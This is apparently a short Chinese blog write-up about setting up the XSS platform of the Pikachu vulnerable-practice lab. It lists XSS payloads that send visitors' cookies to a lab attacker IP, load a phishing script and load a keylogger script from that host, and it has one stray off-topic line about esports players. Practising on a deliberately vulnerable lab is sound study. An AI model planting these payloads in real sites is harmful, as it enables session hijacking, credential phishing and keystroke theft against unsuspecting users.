xss--xss平台搭建

pikachu

get型xss

1、xss平台需要先修改配置文件

 

 2、payload:<script>document.location='http://192.168.221.135(xss平台的ip地址)/pikachu/pkxss/xcookie/cookie.php?cookie='+document.cookie;</script>

 以后我也要写一个 which LCK player do u like?faker?who is faker ,i don't care.who is chovy ,i don't care.showmaker?抓住此生仅有的机会!

post型xss

1、点击连接后访问本机已经登录后的网站

2、将网站的cookie发送到xss平台

 

payload:192.168.221.135/pikachu/pkxss/xcookie/post.html

钓鱼

修改fish文件,改成自己的ip

 payload:<script src="http://192.168.221.135/pikachu/pkxss/xfish/fish.php"></script>

php版本问题,钓鱼无法成功

解决:cloud.tencent.com/developer/article/1853923

键盘记录

修改代码

 payload:<script src="http://192.168.221.135/pikachu/pkxss/rkeypress/rk.js"></script>

 

posted on   na2co3-  阅读(219)  评论(0编辑  收藏  举报
相关博文:
·  xss防御
·  xss--dvwa靶场
·  Pikachu漏洞靶场 XSS(跨站脚本攻击)
·  pikachu-XSS通关攻略
·  pikachu
阅读排行:
· 25岁的心里话
· 基于 Docker 搭建 FRP 内网穿透开源项目(很简单哒)
· 闲置电脑爆改个人服务器(超详细) #公网映射 #Vmware虚拟网络编辑器
· 一起来玩mcp_server_sqlite,让AI帮你做增删改查!!
· 零经验选手,Compose 一天开发一款小游戏!



点击右上角即可分享
微信分享提示